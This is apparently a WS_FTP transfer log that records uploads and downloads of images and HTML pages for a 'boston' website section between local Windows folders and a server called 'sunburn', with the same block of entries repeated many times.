10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
